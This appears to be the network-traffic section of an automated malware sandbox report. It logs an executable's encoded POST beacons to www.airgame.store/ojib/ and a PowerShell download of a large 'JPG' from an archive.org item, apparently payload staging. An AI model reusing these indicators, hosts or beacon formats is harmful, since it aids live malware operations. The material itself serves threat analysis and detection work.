                                                    Data Raw: 2d 58 72 38 3d 77 7a 77 36 59 73 4a 4e 5a 65 31 44 6f 50 44 4b 6c 72 33 52 30 66 45 61 39 4e 4a 56 75 61 33 32 35 45 31 4e 4c 6e 62 30 50 73 4b 6e 2b 74 62 69 63 73 4a 43 33 37 4c 43 4d 77 39 70 38 4e 69 66 4b 66 6f 55 6a 39 62 37 43 37 34 57 68 56 65 46 35 46 4e 71 4a 46 53 5a 6a 7a 64 47 6f 58 36 47 79 6d 4e 45 4b 64 4c 76 31 41 34 72 47 74 73 59 44 32 2b 7a 35 58 4b 73 43 34 34 62 2b 67 38 52 44 64 69 54 4e 76 63 53 74 77 52 56 34 78 30 32 43 62 6b 69 6c 50 2b 54 69 65 75 45 66 74 51 69 4d 71 33 49 4e 38 78 51 67 65 4d 54 35 6e 6c 49 33 6c 30 54 35 71 67 32 7a 58 4d 4e 66 65 71 66 45 52 62 52 63 53 41 6a 44 46 63 48
                                                    Data Ascii: -Xr8=wzw6YsJNZe1DoPDKlr3R0fEa9NJVua325E1NLnb0PsKn+tbicsJC37LCMw9p8NifKfoUj9b7C74WhVeF5FNqJFSZjzdGoX6GymNEKdLv1A4rGtsYD2+z5XKsC44b+g8RDdiTNvcStwRV4x02CbkilP+TieuEftQiMq3IN8xQgeMT5nlI3l0T5qg2zXMNfeqfERbRcSAjDFcH
                                                    Oct 10, 2024 10:01:51.319740057 CEST744INHTTP/1.1 405 Not Allowed
                                                    Date: Thu, 10 Oct 2024 08:01:51 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObaZxJjkkLme8Wq0wDuyxtMSkwngHQiIwoTwOaod%2BHIU9emzF2VkxipGc%2BM9rT2D%2FX6IvENUynD59eqlFO72GXXndNhhrgOIXGDOr61StG5yzCXopP7Fb4%2BsVf2N66eONZwO9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0515b58c031875-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.649964188.114.96.380524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:53.112606049 CEST771OUTPOST /ojib/ HTTP/1.1
                                                    Host: www.airgame.store
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 233
                                                    Origin: http://www.airgame.store
                                                    Referer: http://www.airgame.store/ojib/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 77 7a 77 36 59 73 4a 4e 5a 65 31 44 79 76 7a 4b 67 4d 44 52 32 2f 45 62 6a 64 4a 56 67 4b 33 79 35 45 35 4e 4c 6a 43 78 4f 65 75 6e 2b 4a 58 69 62 64 4a 43 30 37 4c 43 43 51 39 73 6a 64 69 42 4b 65 55 63 6a 39 58 37 43 2f 6f 57 68 52 53 46 34 79 5a 74 4a 56 53 48 32 44 64 45 33 48 36 47 79 6d 4e 45 4b 64 65 43 31 41 51 72 47 63 38 59 53 6e 2b 77 6c 6e 4b 74 55 6f 34 62 36 67 38 56 44 64 6a 77 4e 75 41 34 74 79 5a 56 34 7a 73 32 44 4b 6b 68 73 50 2b 56 2f 75 76 30 53 74 39 59 55 4c 32 55 47 64 4a 6d 35 63 38 33 78 78 6b 53 72 57 30 77 72 36 41 30 7a 56 55 2f 66 2b 71 31 47 52 6a 52 4f 46 4d 45 4d 78 35 6b 4d 43 48 6b 2f 37 6d 30 53 44 6a 79 72 54 7a 53 57 62 4e 37 44 51 3d 3d
                                                    Data Ascii: -Xr8=wzw6YsJNZe1DyvzKgMDR2/EbjdJVgK3y5E5NLjCxOeun+JXibdJC07LCCQ9sjdiBKeUcj9X7C/oWhRSF4yZtJVSH2DdE3H6GymNEKdeC1AQrGc8YSn+wlnKtUo4b6g8VDdjwNuA4tyZV4zs2DKkhsP+V/uv0St9YUL2UGdJm5c83xxkSrW0wr6A0zVU/f+q1GRjROFMEMx5kMCHk/7m0SDjyrTzSWbN7DQ==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.649965188.114.96.380524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:55.661814928 CEST1784OUTPOST /ojib/ HTTP/1.1
                                                    Host: www.airgame.store
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.airgame.store
                                                    Referer: http://www.airgame.store/ojib/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 77 7a 77 36 59 73 4a 4e 5a 65 31 44 79 76 7a 4b 67 4d 44 52 32 2f 45 62 6a 64 4a 56 67 4b 33 79 35 45 35 4e 4c 6a 43 78 4f 65 6d 6e 2b 36 66 69 63 4f 68 43 31 37 4c 43 64 67 39 74 6a 64 6a 45 4b 66 38 59 6a 39 4b 47 43 39 67 57 75 55 4f 46 2f 48 31 74 48 56 53 48 30 44 64 42 6f 58 36 66 79 6d 64 41 4b 64 4f 43 31 41 51 72 47 66 30 59 53 32 2b 77 6e 6e 4b 73 43 34 34 66 2b 67 38 74 44 64 4c 4f 4e 75 55 43 74 43 35 56 35 54 38 32 45 34 4d 68 6a 50 2b 58 2b 75 76 73 53 74 78 39 55 4c 71 59 47 64 73 39 35 63 59 33 67 6b 52 58 7a 31 49 64 78 70 63 44 77 57 78 65 47 72 54 4b 4a 79 57 73 43 56 41 4f 52 79 6c 47 55 6b 7a 72 34 4c 66 6f 63 79 47 65 72 57 65 56 58 61 67 38 55 68 44 38 4d 76 6a 73 48 6a 78 52 39 72 61 58 61 37 62 38 78 70 45 54 78 39 49 4a 4e 53 35 65 69 69 4d 4c 39 7a 72 59 36 59 36 66 6b 77 34 76 78 51 57 41 2b 57 56 36 38 4e 57 75 51 61 58 63 76 4c 69 72 32 58 47 74 2b 4d 74 70 45 32 47 4c 68 59 57 66 74 4e 58 30 53 74 76 69 6d 53 6e 31 7a 2b 7a 58 6c 55 62 46 78 58 63 68 37 [TRUNCATED]
                                                    Data Ascii: -Xr8=wzw6YsJNZe1DyvzKgMDR2/EbjdJVgK3y5E5NLjCxOemn+6ficOhC17LCdg9tjdjEKf8Yj9KGC9gWuUOF/H1tHVSH0DdBoX6fymdAKdOC1AQrGf0YS2+wnnKsC44f+g8tDdLONuUCtC5V5T82E4MhjP+X+uvsStx9ULqYGds95cY3gkRXz1IdxpcDwWxeGrTKJyWsCVAORylGUkzr4LfocyGerWeVXag8UhD8MvjsHjxR9raXa7b8xpETx9IJNS5eiiML9zrY6Y6fkw4vxQWA+WV68NWuQaXcvLir2XGt+MtpE2GLhYWftNX0StvimSn1z+zXlUbFxXch7oWc65r+pw0epOVd5WF9l5MyyBJerGzjAwmUk/FcdUJRAClmxBNlEp24/KrZOCO62jugn4YRLVWp5DTx9Bf6vlSjl/WIUjb09+9HwnR2KJpgxAyY/UQI7xYoW1zEvUYeIyRoOdFWhxcbbrgDXap5/bhsZS5AhMzbDjzjykqkkciz9rtbVL6F5jnn9NQQNFLMO+68US9EPk7NzcDwOH9mCvi4NvdkXc1cs99lntUjkT2dCVIg5rx09tCGQMps+KXohe0rs+cBJ1L+ugrNzEVg0P23YwTvt9Mb+ESEkzSPZryFKx1YAD4Mz/OHndscVNMoxH4rwMoDcmh930mv3NoF9WO/pGuj2kxMB5wPmc3kdZ9jOPB1y53U4M6In2nUCjnKs0mWIpaxRpBxHxxlIZMrJyEEHiRdQT46hR7FmfGc3QsQvqTYP4CTq2ZehHlAG6mNLkqQVXoMXOfd+oMPjhxDBQE0KA2SMl6ufEGW27LcJT8nQnI+cv6t6j9Ks7LV9DUyRkcjWoyJzd0lIFwCI64UGQc2Ar21IXgDj0IsM5lMatf+dEITEwPFl5JLpsGU+Er0ZLOUNSdp8NWLYOwkYmaJiGtr6UXEFHv1OVlaQdvaicEs+m2lLssUvNDGPufB/hWKojUIb8po+NCt6K16pgGDQNYIMb8+CQk26pm [TRUNCATED]
                                                    Oct 10, 2024 10:01:56.276642084 CEST740INHTTP/1.1 405 Not Allowed
                                                    Date: Thu, 10 Oct 2024 08:01:56 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGpysu5EoRzZVs7IcYRIDEG7%2BABa6A1OVfIKkFt046RJws23PKjcrVnQ4N3D92Rrsb%2FN95ppGVdxCUkqcIE7Hvdd100BGQXLctT7ZWt5iByrtRv7BoQE5AN3WqkLzvpnn5aUOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0515d55ece8c42-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.649966188.114.96.380524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:58.394484997 CEST488OUTGET /ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68 HTTP/1.1
                                                    Host: www.airgame.store
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Oct 10, 2024 10:01:59.014542103 CEST1236INHTTP/1.1 200 OK
                                                    Date: Thu, 10 Oct 2024 08:01:58 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Sat, 28 Sep 2024 04:22:11 GMT
                                                    Vary: Accept-Encoding
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NskSP93DToPpuxjwlN2fTqtn7zng8AMYheQ4bovqv1nfvaFKE2NjKfZpGM93%2F3zzfSfsRzkliTQQtbW5ii6niOQ%2B0MtOicJgZltNS%2BaEWZrNOOJMEkedsOTJ4EvvPrWM7b0GVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                    Server: cloudflare
                                                    CF-RAY: 8d0515e66e4c42ea-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 35 36 62 64 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 [TRUNCATED]
                                                    Data Ascii: 56bd<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><title>actionarena.top: Where happiness meets innovation | Online Game | Free Game</title><link href="css/chunk-common.2627b58b.css" rel="preload" as="style">
                                                    Oct 10, 2024 10:01:59.014569044 CEST1236INData Raw: 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 64 66 39 31 39 39 37 35 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d
                                                    Data Ascii: <link href="css/chunk-vendors.df919975.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.css" rel="stylesheet"><link href="css/chunk-common.2627b58b.css" rel="stylesheet"><link href="css/index.c29d2c62.css" rel="styles
                                                    Oct 10, 2024 10:01:59.014580011 CEST1236INData Raw: 70 74 61 67 20 3d 20 77 69 6e 64 6f 77 2e 61 69 70 74 61 67 20 7c 7c 20 7b 63 6d 64 3a 20 5b 5d 7d 3b 0a 09 09 61 69 70 74 61 67 2e 63 6d 64 2e 64 69 73 70 6c 61 79 20 3d 20 61 69 70 74 61 67 2e 63 6d 64 2e 64 69 73 70 6c 61 79 20 7c 7c 20 5b 5d
                                                    Data Ascii: ptag = window.aiptag || {cmd: []};aiptag.cmd.display = aiptag.cmd.display || [];aiptag.cmd.player = aiptag.cmd.player || [];//CMP tool settingsaiptag.cmp = {show: true,position: "centered", //centered, bottombutton: t
                                                    Oct 10, 2024 10:01:59.014658928 CEST672INData Raw: 6c 6f 61 64 20 74 68 69 73 20 63 6f 75 6c 64 20 62 65 20 64 75 65 20 74 6f 20 61 6e 20 61 64 62 6c 6f 63 6b 65 72 2c 20 74 69 6d 65 6f 75 74 20 65 74 63 2e 0a 09 09 09 09 2f 2f 50 6c 65 61 73 65 20 61 64 64 20 79 6f 75 72 20 73 63 72 69 70 74 20
                                                    Data Ascii: load this could be due to an adblocker, timeout etc.//Please add your script here that starts the content, this usually is the same script as added in AIP_COMPLETE.alert("Ad Could not be loaded, load your content here");aiptag.a
                                                    Oct 10, 2024 10:01:59.014671087 CEST1236INData Raw: 34 72 65 6d 20 30 2e 37 72 65 6d 3b 22 3e 0a 09 09 09 09 4d 65 6e 75 0a 09 09 09 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d
                                                    Data Ascii: 4rem 0.7rem;">Menu</h3><a data-v-49759819="" href="index.html" class="type_item"><div data-v-49759819="" class="type_item"style="color: rgb(255, 255, 255); background: rgb(6, 184, 184);"><img data-v-49759819="" al
                                                    Oct 10, 2024 10:01:59.014683008 CEST1236INData Raw: 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 74 79 70 65 3d 41 64 76 65 6e 74 75 72 65 22 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65
                                                    Data Ascii: </a><a data-v-49759819="" href="search.html?type=Adventure" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/adventure.ddef2683.png"data-src="img/adventure.ddef2683.png" style="width: 1
                                                    Oct 10, 2024 10:01:59.014694929 CEST1236INData Raw: 74 72 61 74 65 67 79 2e 31 64 66 63 61 38 32 32 2e 70 6e 67 22 0a 09 09 09 09 09 09 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 2e 35 72 65 6d 3b 20 68 65 69 67 68 74 3a 20 31 2e 35 72 65 6d 3b 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74
                                                    Data Ascii: trategy.1dfca822.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Strategy</span></div></a><a data-v-49759819="" href="search.html?type=Sports" class="type_item">
                                                    Oct 10, 2024 10:01:59.014708042 CEST1236INData Raw: 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 74 79 70 65 3d 43 61 73 75 61 6c 22 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69
                                                    Data Ascii: ="search.html?type=Casual" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/casual.02d29de8.png" data-src="img/casual.02d29de8.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-497
                                                    Oct 10, 2024 10:01:59.014719009 CEST1236INData Raw: 32 39 33 36 39 34 63 2d 32 31 2e 31 38 31 39 37 33 20 30 2d 33 38 2e 33 37 33 31 33 39 2d 31 37 2e 31 39 31 31 36 36 2d 33 38 2e 33 37 33 31 33 38 2d 33 38 2e 33 37 33 31 33 39 73 31 37 2e 31 39 31 31 36 36 2d 33 38 2e 33 37 33 31 33 39 20 33 38
                                                    Data Ascii: 293694c-21.181973 0-38.373139-17.191166-38.373138-38.373139s17.191166-38.373139 38.373138-38.373139h316.706306c21.181973 0 38.373139 17.191166 38.373139 38.373139 0 21.284301-17.191166 38.373139-38.373139 38.373139z"fill="#CD853F" p-id
                                                    Oct 10, 2024 10:01:59.014725924 CEST1236INData Raw: 37 2e 36 20 31 37 37 2e 36 63 31 38 2e 39 20 31 38 2e 39 20 34 39 2e 39 20 31 38 2e 39 20 36 38 2e 39 20 30 20 31 38 2e 39 2d 31 39 2e 33 20 31 38 2e 39 2d 35 30 2e 33 2d 30 2e 31 2d 36 39 2e 32 7a 4d 34 35 35 2e 33 20 37 36 38 2e 33 63 2d 31 37
                                                    Data Ascii: 7.6 177.6c18.9 18.9 49.9 18.9 68.9 0 18.9-19.3 18.9-50.3-0.1-69.2zM455.3 768.3c-170.9 0-310-139.8-310-311.7s139-311.7 310-311.7c170.9 0 310 139.8 310 311.7s-139.1 311.7-310 311.7z"p-id="3079" data-spm-anchor-id="a313x.7781069.0.i0" fil
                                                    Oct 10, 2024 10:01:59.019551992 CEST1236INData Raw: 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 33 36 32 62 36 61 32 36 3d 22 22 20 63 6c 61 73 73 3d 22 68 6f 6d 65 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 33 36 32 62 36 61 32 36
                                                    Data Ascii: </div><div><div data-v-362b6a26="" class="home"><div data-v-362b6a26="" class="mid_content">...adStart <div id='div-gpt-ad-1471716176038' style='min-width: 300px; min-height: 250px;'>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.649711207.241.227.2424431492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-10 08:00:01 UTC117OUTGET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                    Host: ia600102.us.archive.org
                                                    Connection: Keep-Alive
                                                    2024-10-10 08:00:01 UTC591INHTTP/1.1 200 OK
                                                    Server: nginx/1.24.0 (Ubuntu)
                                                    Date: Thu, 10 Oct 2024 08:00:01 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 6331693
                                                    Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                    Connection: close
                                                    ETag: "6704abca-609d2d"
                                                    Strict-Transport-Security: max-age=15724800
                                                    Expires: Thu, 10 Oct 2024 14:00:01 GMT
                                                    Cache-Control: max-age=21600
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                    Access-Control-Allow-Credentials: true
                                                    Accept-Ranges: bytes
                                                    2024-10-10 08:00:01 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                    2024-10-10 08:00:01 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                    Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                    2024-10-10 08:00:01 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                    Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
